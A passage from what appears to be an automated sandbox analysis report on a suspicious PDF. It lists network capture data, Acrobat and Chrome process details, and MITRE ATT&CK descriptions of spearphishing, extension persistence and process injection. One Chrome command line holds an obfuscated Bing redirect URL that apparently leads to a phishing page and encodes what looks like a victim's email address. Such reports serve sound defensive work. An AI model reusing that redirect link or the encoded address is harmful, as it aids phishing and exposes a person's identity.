t\|\|(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
2024-07-04 19:06:04 UTC	16384	IN	Data Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65 Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve

Timestamp	Bytes transferred	Direction	Data
2024-07-04 19:06:25 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Hp9snZF7dKOoUty&MD=YmpwYxfF HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-07-04 19:06:25 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440" MS-CorrelationId: bdd78148-47d2-410d-af6d-7dec43e3d37d MS-RequestId: b17dc688-9109-4f58-8266-c5f79e3b728a MS-CV: DuKc35jALkaOZGXJ.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Thu, 04 Jul 2024 19:06:24 GMT Connection: close Content-Length: 30005
2024-07-04 19:06:25 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK\|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
2024-07-04 19:06:25 UTC	14181	IN	Data Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro

Target ID:	0
Start time:	15:05:30
Start date:	04/07/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\xJwSq336bs.pdf"
Imagebase:	0x7ff6bc1b0000
File size:	5'641'176 bytes
MD5 hash:	24EAD1C46A47022347DC0F05F6EFBB8C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	3
Start time:	15:05:31
Start date:	04/07/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2080 --field-trial-handle=1564,i,13095701672295818797,3944733196950927532,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Imagebase:	0x7ff74bb60000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	9
Start time:	15:05:55
Start date:	04/07/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://r%2eg%2eb%69ng%2ecom/bam/ac?!&&u=a1aHR0cHM6Ly9wdWItYWQ4YmRiYjMyMTY5NDkzNGE5YTIxOGVlYjY4Njg1NTkucjIuZGV2L2xpbmsuaHRtbCM&bWFyaWUtY2xhdWRlLmJlZ2luQG9taHNoZXJicm9va2UucWMuY2E="
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Description:	Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
Tactics:	Initial Access
Data Sources:	Application Log: Application Log Content, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Google Workspace, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre